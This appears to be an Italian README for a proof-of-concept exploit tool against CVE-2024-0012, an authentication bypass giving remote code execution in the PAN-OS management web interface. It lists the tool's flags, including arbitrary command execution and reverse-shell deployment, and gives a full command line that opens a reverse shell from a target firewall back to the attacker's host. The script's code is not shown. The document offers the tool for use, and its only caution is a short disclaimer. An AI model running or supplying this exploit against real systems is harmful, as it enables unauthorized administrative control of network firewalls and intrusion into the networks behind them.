
CVE-2024-0012 PAN-OS: Bypass dell'autenticazione nell'interfaccia web di gestione (PAN-SA-2024-0015) RCE POC
CVE-2024-0012 è un bypass di autenticazione nel software PAN-OS di Palo Alto Networks che consente a un utente malintenzionato non autenticato, con accesso di rete all'interfaccia web di gestione, di ottenere privilegi di amministratore PAN-OS per eseguire azioni amministrative, manomettere la configurazione o sfruttare altre vulnerabilità di escalation dei privilegi autenticate.

| ❗ Disclaimer |
|---|
| Questo progetto è principalmente realizzato per essere utilizzato come strumento CLI autonomo. Eseguire questo exploit come servizio può comportare rischi per la sicurezza. Si consiglia di utilizzarlo con cautela e con misure di sicurezza aggiuntive. DWYOR |
python3 cve-2024-0012.py -h
Questo mostrerà l'aiuto per lo strumento. Ecco tutte le opzioni supportate.
Usage:
python3 cve-2024-0012.py [flags]
Flags:
-h, --help show this help message and exit
--url URL Target base URL (http:// or https://)
--no-verify Disable SSL verification
--timeout TIMEOUT Request timeout in seconds
--command COMMAND Command to execute on the target
--reverse-shell Deploy a reverse shell to the target
--lhost LHOST Local host for reverse shell connection (required for reverse shell)
--lport LPORT Local port for reverse shell connection (required for reverse shell)
Comando per reverse shell.
python3 cve-2024-0012.py --url "http://target.url" --no-verify --reverse-shell --lhost "your-ip" --lport 4444